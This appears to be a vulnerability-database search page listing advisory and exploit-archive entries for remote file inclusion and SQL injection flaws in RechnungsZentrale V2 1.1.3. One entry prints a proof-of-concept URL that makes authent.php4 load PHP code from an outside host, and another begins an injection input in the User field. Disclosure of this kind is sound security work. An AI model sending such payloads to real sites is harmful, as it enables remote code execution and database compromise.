13 matches found
EUVD-2006-1954
Malware in sbrugna...
EUVD-2006-1955
Malware in sbrugna...
RechnungsZentrale V2 <= 1.1.3 - Remote Inclusion Vulnerability
No description provided by source. - GroundZero Security Research and Software Development 2006 - Software: RechnungsZentrale V2 Version: 1.1.3, likely older versions are affected aswell. Vendor: http://www.nfec.de/ Remote Inclusion:...
CVE-2006-1955
PHP remote file inclusion vulnerability in authent.php4 in Nicolas Fischer aka NFec RechnungsZentrale V2 1.1.3, and possibly earlier versions, allows remote attackers to execute arbitrary PHP code via a URL in the rootpath parameter...
CVE-2006-1955
The CVE-2006-1955 entry concerns RechnungsZentrale V2 (Nicolas Fischer/NFec) with versions 1.1.3 and earlier affected by a PHP remote file inclusion via the rootpath parameter in authent.php4, enabling possible arbitrary PHP code execution. Affected component: authent.php4; root cause: insecure h...
CVE-2006-1954
Vulnerability summary (CVE-2006-1954) : A SQL injection in the authent.php4 component of RechnungsZentrale V2 (version 1.1.3 and possibly earlier) allows remote attackers to execute arbitrary SQL commands via the User field. The issue is triggered in the authentication path of RechnungsZentrale V...
PT-2006-2939 · Unknown · Rechnungszentrale V2
Name of the Vulnerable Software and Affected Versions: RechnungsZentrale V2 versions 1.1.3 and earlier Description: A remote file inclusion issue in the authent.php4 file allows remote attackers to execute arbitrary PHP code via a URL in the rootpath parameter. Recommendations: For...
RechnungsZentrale V2 <= 1.1.3 Remote Inclusion Vulnerability
Exploit for unknown platform in category web applications ============================================================ RechnungsZentrale V2 = 1.1.3 Remote Inclusion Vulnerability ============================================================ - GroundZero Security Research and Software Development...
RechnungsZentrale V2 1.1.3 - Remote File Inclusion
RechnungsZentrale V2 1.1.3 - Remote File Inclusion - GroundZero Security Research and Software Development 2006 - Software: RechnungsZentrale V2 Version: 1.1.3, likely older versions are affected aswell. Vendor: http://www.nfec.de/ Remote Inclusion:...
RechnungsZentrale V2 <= 1.1.3 Remote Inclusion Vulnerability
No description provided by source. - GroundZero Security Research and Software Development 2006 - Software: RechnungsZentrale V2 Version: 1.1.3, likely older versions are affected aswell. Vendor: http://www.nfec.de/ Remote Inclusion:...
RechnungsZentrale V2 < 1.1.3 - Remote File Inclusion
GroundZero Security Research and Software Development 2006 - Software: RechnungsZentrale V2 Version: 1.1.3, likely older versions are affected aswell. Vendor: http://www.nfec.de/ Remote Inclusion: http://www.victim.tld/mod/authent.php4?rootpath=Http://server.tld/mod/db.php4 SQL Injection: User: '...
[Full-disclosure] RechnungsZentrale V2 - SQL injection and Remote PHP inclusion vulnerabilities
The Advisory can be found here: http://www.g-0.org/code/rz2-adv.html Regards, GroundZero Security Research and Software Development http://www.groundzero-security.com Wir widersprechen der Nutzung oder Ubermittlung unserer Daten fur Werbezwecke oder fur die Markt- oder Meinungsforschung § 28 Abs....
RechnungsZentrale 2 1.1.3 - 'Authent.php4' SQL Injection
source: https://www.securityfocus.com/bid/17588/info RechnungsZentrale V2 is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to...